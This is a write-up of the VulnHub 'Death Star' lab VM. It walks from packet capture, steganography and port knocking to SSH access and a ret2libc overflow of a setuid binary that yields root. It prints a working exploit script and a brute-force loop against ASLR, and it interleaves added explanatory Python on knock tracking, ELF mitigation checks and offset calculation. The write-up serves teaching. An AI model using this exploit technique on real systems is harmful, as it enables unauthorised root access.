[VLN] DeathStar

Today we are going to hack the VulnHub machine called Death Star. You can download it from the following link: DeathStar

Video


Enumeration


On this machine nmap is of little use :) The first step is to open Wireshark and filter on the victim machine's IP with the following filter:

ip.addr == 192.168.1.95
With a bit of patience, we will see that we receive 2 UDP packets containing the following information:

Thanks to the successful Operation Skyhook, the Rebel Alliance
got some plans for the new weapon of the Galactic Empire. We
know that there is a small opening that we can explore through a
thermal exhaust that is directly connected to the Main Reactor of the
Death Star. The superlaser takes 1440 minutes to reload.
It is very important to observe 'this window' in order to recover the blueprint.
This is because, it is only possible to make an attempt every 60 seconds.
And the other packet:

Code to access the Death Star Blueprint
within the time it takes to reload is:  DS-1@OBS     
Reading them, we are given the access code (DS-1@OBS) and, on the other hand, we see the number 1440... So if we try sending some data over UDP to port 1440, it replies with something like "Wrong Code". Since we have the code, we send it and save everything we receive to the file death.txt. We see that it is base64, so we decode it into death2, and finally we use file to see that it is an image...

sml@Cassandra:~$ echo -e "DS-1@OBS" | nc -u -w1 192.168.1.95 1440 > death.txt
sml@Cassandra:~$ cat death.txt | base64 -d > death2
sml@Cassandra:~$ file death2
death2: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, 
segment length 16, baseline, precision 8, 900x688, components 3
sml@Cassandra:~$ mv death2 death2.jpeg
When we open the image we see an "unlock code", but we don't know what to do with it. We use steghide with the earlier code "DS-1@OBS" as the passphrase to see whether we can extract any information.

sml@Cassandra:~$ steghide extract -sf death2.jpeg 
Anotar salvoconducto: 
anoté los datos extraidos e/"openTheExhaust.txt".
We look at the file we just extracted.

sml@Cassandra:~$ cat openTheExhaust.txt 
Each segment of the "unlock code" can only contain 3 characters sent in 
sequence to unlock port 10110.
We have to split the unlock code into groups of 3 digits and then port knock with them so that port 10110 opens. We download a "knocker".
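As an added illustration of the rule in openTheExhaust.txt (this is example code written for this write-up, not the knock.py tool nor anything taken from the VM), the following splits an unlock code into 3-character segments and then runs a defender-side knock tracker: the kind of state machine a knock daemon keeps per source address, which only reports the sequence as complete when every segment arrives in order within a time window, and resets on any wrong port. The unlock code string "197719801983" is reconstructed from the four ports used in the knock command further down; the 10-second window is an assumed value.

```python
# Added example for this write-up: unlock-code splitting plus a per-source
# port-knock sequence tracker (the daemon side of what knock.py drives).

KNOCK_WINDOW = 10.0  # seconds a partial sequence stays valid (assumed value)


def split_unlock_code(code, segment_len=3):
    """Split the unlock code into fixed-width segments and return them as ports."""
    if not code or len(code) % segment_len != 0:
        raise ValueError("unlock code length is not a multiple of %d" % segment_len)
    ports = [int(code[i:i + segment_len]) for i in range(0, len(code), segment_len)]
    for port in ports:
        if not 1 <= port <= 65535:
            raise ValueError("segment %d is not a valid TCP port" % port)
    return ports


class KnockTracker:
    """Per-source state machine: the sequence counts only if it is complete and in order."""

    def __init__(self, sequence, window=KNOCK_WINDOW):
        self.sequence = list(sequence)
        self.window = window
        # src -> (index of the next expected port, timestamp of the last correct knock)
        self.progress = {}

    def observe(self, src, port, ts):
        """Feed one observed connection attempt; True when `src` completed the sequence."""
        idx, last = self.progress.get(src, (0, ts))
        if ts - last > self.window:
            idx = 0  # the partial sequence expired, start over
        if port == self.sequence[idx]:
            idx += 1
        elif port == self.sequence[0]:
            idx = 1  # a wrong port followed by the first port restarts the sequence
        else:
            idx = 0  # any other port resets progress
        if idx == len(self.sequence):
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, ts)
        return False


def sources_completing(sequence, events, window=KNOCK_WINDOW):
    """Replay (timestamp, src, dst_port) events and return the sources that completed the knock."""
    tracker = KnockTracker(sequence, window)
    return [(ts, src) for ts, src, port in events if tracker.observe(src, port, ts)]


if __name__ == "__main__":
    # Constructed sample events, as a knock daemon might see them from a packet capture.
    seq = split_unlock_code("197719801983")  # reconstructed from the knock command
    log = [(1.0, "10.0.0.5", 197), (1.5, "10.0.0.5", 719),
           (2.0, "10.0.0.5", 801), (2.5, "10.0.0.5", 983),
           (3.0, "10.0.0.9", 197), (3.5, "10.0.0.9", 983)]
    print(seq, sources_completing(seq, log))
```

The tracker keys on the source address, so two hosts knocking at the same time do not share progress, and the window keeps a half-finished sequence from being completed hours later; both are the checks a knock daemon needs to be more than a fixed sequence of ports.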

sml@Cassandra:~$ wget https://raw.githubusercontent.com/grongor/knock/master/knock -O knock.py
--2020-05-17 00:58:07--  https://raw.githubusercontent.com/grongor/knock/master/knock
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2932 (2,9K) [text/plain]
Grabando a: ‘knock.py’

knock.py                                  100%[==================================================================================>]   2,86K  --.-KB/s    en 0s      

2020-05-17 00:58:07 (28,8 MB/s) - ‘knock.py’ guardado [2932/2932]
We run it:

sml@Cassandra:~$ python3 knock.py 192.168.1.95 197 719 801 983
And we try connecting over ssh to the port the text file told us about.

sml@Cassandra:~$ ssh 192.168.1.95 -p 10110
                    
Devoloped by Galen Walton Erso
System's user: erso
Pass Hint: My wife's first name plus the year (BBY) she died.

Glory to the Empire - Project DS-1: Orbital Battle Station
sml@192.168.1.95's password:
In the banner we see that the system user is erso, and that the password is his wife's first name plus the year she died. If we search the Internet we find that his wife was called Lyra and died in 13 (BBY), so the password is: lyra13. We log in as user erso...

Low Shell



sml@Cassandra:~$ ssh erso@192.168.1.95 -p 10110
                                                                 
Devoloped by Galen Walton Erso
System's user: erso
Pass Hint: My wife's first name plus the year (BBY) she died.

Glory to the Empire - Project DS-1: Orbital Battle Station

erso@192.168.1.95's password
erso@deathStar1:~$ 
We're in :) Let's explore the system.

erso@deathStar1:~$ ls
warning.txt
erso@deathStar1:~$ cat warning.txt 

Message from GALEN ERSO:
This is your chance. Destroy the plans of the Galactic Empire. I know that Lord 
Vader 
will not like this at all. But, this will be my chance for redemption. 
I hope you have enough knowledge to help destroy this new weapon.
Explore the system and get 'root access' to read the secret message located at 
'/root/message.txt'. 
Hack or fail!!
We take a look at files with "special" permissions (setuid binaries).

erso@deathStar1:~$ find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/pkexec
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/su
/bin/ping6
/bin/fusermount
/bin/dartVader
/bin/umount
/bin/mount
/bin/ping
We see the file called /bin/dartVader.

erso@deathStar1:~$ /bin/dartVader
dartVader: Voce tem um futuro aqui. Nao seja um Lammer, busque e aprenda 
realmente...
After some testing, the binary turns out to be vulnerable to ret2libc... We download it to our own machine.
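A defender-side check worth running on a setuid binary like this one, added here as example code for the write-up (it is not a tool the author used and it makes no claim about what dartVader itself reports): the mitigations that decide whether a plain stack overflow turns into a ret2libc chain can all be read from the ELF headers. A stack canary would abort the program before an overwritten return address is used; a non-executable stack is what pushes an attacker toward ret2libc instead of shellcode on the stack; PIE randomises the binary's own addresses. The function below is a minimal checksec-style reader for 32-bit ELF files; `build_test_elf` fabricates a tiny ELF image purely so the reader can be exercised offline and is not a real program. The canary test is a heuristic (a reference to `__stack_chk_fail` anywhere in the file), as the common checksec scripts do.

```python
import struct

# ELF32 constants from the System V ABI and the Linux ELF headers
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1


def elf32_mitigations(data):
    """Report PIE / NX / RELRO / canary for a 32-bit ELF image held in `data`.

    pie    : e_type == ET_DYN, so the loader can place the binary anywhere
    nx     : a PT_GNU_STACK program header exists and lacks PF_X
             (on x86 a missing PT_GNU_STACK means an executable stack)
    relro  : a PT_GNU_RELRO program header exists
    canary : heuristic, the file references __stack_chk_fail
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1:  # EI_CLASS: 1 = ELFCLASS32
        raise ValueError("only ELF32 is handled by this example")
    end = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little-endian
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack(end + "HHIIIIIHHH", data[16:46])
    nx = False      # executable stack unless a PT_GNU_STACK header says otherwise
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, _, _, _, _, _, p_flags, _ = struct.unpack(end + "IIIIIIII", data[off:off + 32])
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro,
            "canary": b"__stack_chk_fail" in data}


def build_test_elf(e_type=ET_EXEC, stack_flags=0x6, with_canary_symbol=False,
                   with_stack_header=True):
    """Constructed minimal ELF32 image (header plus one PT_GNU_STACK entry) for testing only."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELF32, little-endian, version 1
    phnum = 1 if with_stack_header else 0
    # e_type, e_machine(i386), e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    header = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x8048000,
                                 52, 0, 0, 52, 32, phnum, 40, 0, 0)
    phdr = b""
    if with_stack_header:
        phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    tail = b"__stack_chk_fail\x00" if with_canary_symbol else b""
    return header + phdr + tail


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_test_elf()
    print(elf32_mitigations(data))
```

Run it against any 32-bit binary with `python3 checksec32.py /path/to/file`; with no argument it inspects the fabricated test image. Note that NX alone does not stop a ret2libc chain (the chain only reuses code that is already executable), which is why the remaining defence against this class of bug is the canary plus enough ASLR entropy that a base address cannot be guessed in a loop.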

Exploit



sml@Cassandra:~$ scp -P 10110 erso@192.168.1.95:/bin/dartVader .
                                                                   
Devoloped by Galen Walton Erso
System's user: erso
Pass Hint: My wife's first name plus the year (BBY) she died.

Glory to the Empire - Project DS-1: Orbital Battle Station

erso@192.168.1.95's password: 
dartVader                                                                       100% 7338     7.0MB/s   00:00
We fire up GDB with PEDA to see where it "blows up"...

sml@Cassandra:~$ gdb -q dartVader
Reading symbols from dartVader...
(No debugging symbols found in dartVader)
gdb-peda$ pattern_create 250
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b'
gdb-peda$ pset arg 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b'
gdb-peda$ run
Starting program: /home/sml/dartVader 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1f0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
EBX: 0x0 
ECX: 0xffffd560 --> 0x45485300 ('')
EDX: 0xffffd2ea --> 0xd5d2ff00 
ESI: 0xf7fb3000 --> 0x1dfd6c 
EDI: 0xf7fb3000 --> 0x1dfd6c 
EBP: 0x65414149 ('IAAe')
ESP: 0xffffd240 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
EIP: 0x41344141 ('AA4A')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41344141
[------------------------------------stack-------------------------------------]
0000| 0xffffd240 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0004| 0xffffd244 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0008| 0xffffd248 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0012| 0xffffd24c ("AgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0016| 0xffffd250 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0020| 0xffffd254 ("AAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0024| 0xffffd258 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0028| 0xffffd25c ("MAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41344141 in ?? ()
gdb-peda$ pattern_offset 0x41344141
1093943617 found at offset: 76   
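How pattern_offset arrives at 76, shown as added example code for this write-up (it is not PEDA's own implementation): the value that crashed in EIP is the four pattern bytes that landed on the saved return address, read back as a little-endian integer, so packing the register value back into bytes and searching the pattern gives the offset. The PATTERN constant is the 250-byte string PEDA printed in the session above, copied from the page; the same lookup on EBP and on the bytes ESP points to confirms the frame layout (saved EBP at 72, return address at 76, ESP at 80 after the ret).

```python
import struct

# The 250-byte pattern PEDA generated above (pattern_create 250), copied from the session.
PATTERN = (
    b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4"
    b"AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA"
    b"qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA"
    b"%aA%0A%FA%b"
)


def register_bytes(value):
    """The four bytes a 32-bit little-endian register holds when it contains `value`."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def pattern_offset(pattern, value):
    """Offset in `pattern` of the bytes that ended up in a register, or -1 if absent.

    Mirrors the idea behind PEDA's pattern_offset: undo the little-endian load,
    then locate that 4-byte window. A second hit would make the answer ambiguous.
    """
    needle = register_bytes(value)
    pos = pattern.find(needle)
    if pos != -1 and pattern.find(needle, pos + 1) != -1:
        raise ValueError("pattern window %r occurs more than once" % needle)
    return pos


def frame_layout(pattern, eip, ebp):
    """Reconstruct the overwritten frame from the crash registers."""
    ret = pattern_offset(pattern, eip)
    if ret == -1:
        raise ValueError("EIP value 0x%08x was not taken from the pattern" % eip)
    return {
        "saved_ebp": pattern_offset(pattern, ebp),   # bytes that landed in the saved EBP slot
        "return_address": ret,                       # padding needed before the return address
        "stack_after_return": ret + 4,               # what ESP points at once `ret` has popped EIP
    }


if __name__ == "__main__":
    # Register values from the SIGSEGV in the gdb-peda session above.
    print(frame_layout(PATTERN, 0x41344141, 0x65414149))
    print(PATTERN.find(b"AJAAfAA5"))  # bytes ESP pointed at after the crash
```

The `stack_after_return` value is the one that matters for the chain built later: whatever is placed at offset 80 is what `system` sees as its return address, and offset 84 is its first argument.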
Good, we see that the offset is 76. Now, on the deathStar machine, we look at the address of libc.

erso@deathStar1:~$ ldd /bin/dartVader 
        linux-gate.so.1 =>  (0xb7776000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ba000)
        /lib/ld-linux.so.2 (0xb7778000)
The address of system...

erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
The address of exit...

erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 __cxa_at_quick_exit@@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
   446: 000336d0   268 FUNC    GLOBAL DEFAULT   12 __cxa_thread_atexit_impl@@GLIBC_2.18
   554: 000b8634    24 FUNC    GLOBAL DEFAULT   12 _exit@@GLIBC_2.0
   609: 0011e780    56 FUNC    GLOBAL DEFAULT   12 svc_exit@@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 quick_exit@@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 __cxa_atexit@@GLIBC_2.1.3
  1037: 00128ce0    60 FUNC    GLOBAL DEFAULT   12 atexit@GLIBC_2.0
  1380: 001ad204     4 OBJECT  GLOBAL DEFAULT   31 argp_err_exit_status@@GLIBC_2.1
  1492: 000fb610    62 FUNC    GLOBAL DEFAULT   12 pthread_exit@@GLIBC_2.0
  2090: 001ad154     4 OBJECT  GLOBAL DEFAULT   31 obstack_exit_failure@@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 on_exit@@GLIBC_2.0
  2386: 000fc180     2 FUNC    GLOBAL DEFAULT   12 __cyg_profile_func_exit@@GLIBC_2.2
And finally, the address of the "/bin/sh" string...

erso@deathStar1:~$ strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 162d4c /bin/sh
With this data, we put together our exploit, which ends up looking like this:

erso@deathStar1:~$ cat ret.py 
import struct

# Pack a 32-bit address in the target's byte order ("I" is native order, little-endian on i386)
def le(addr):
    return struct.pack("I", addr)

junk = "A"*76                              # padding up to the saved return address (offset 76 from PEDA)
libcbase = 0xb75a5000                      # one candidate libc base; ASLR moves it on every run
libcsystem = le(libcbase + 0x00040310)     # system() offset from readelf
libcexit = le(libcbase + 0x00033260)       # exit() offset: the address system() "returns" to
libcsh = le(libcbase + 0x00162d4c)         # "/bin/sh" string offset from strings -tx
# Stack layout after the overflow: return address -> system, fake return -> exit, first argument -> "/bin/sh"
print junk + libcsystem + libcexit + libcsh    # Python 2 print statement; run it with python2
Since ASLR is enabled, running the exploit a single time will probably not work, so we use a "while" loop to run it until the guessed libc base happens to be the right one.

Privilege Escalation



erso@deathStar1:~$ while true;do /bin/dartVader $(python ret.py);done
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(erso) gid=1000(erso) euid=0(root) groups=0(root),1000(erso)
And we would be root!

root.txt



# cd /root
# ls
message.txt
# cat mess
cat: mess: No such file or directory
# cat message.txt
Art by Shanaka Dias
                    .==.
                   ()''()-.
        .---.       ;--; /
      .'_:___". _..'.  __'.
      |__ --==|'-''' \'...;
      [  ]  :[|       |---\
      |__| I=[|     .'    '.
      / / ____|     :       '._
     |-/.____.'      | :       :
snd /___\ /___\      '-'._----'

-------------------------------------

Congratulations!!
You helped me destroy the empire's weapon.

-------------------------------------
If you had fun, love to get your feedback.
Send me a tweet @mrhenrike  ;)

Until the next VM and "May the force be with you".

End


And with that we are root on the machine :)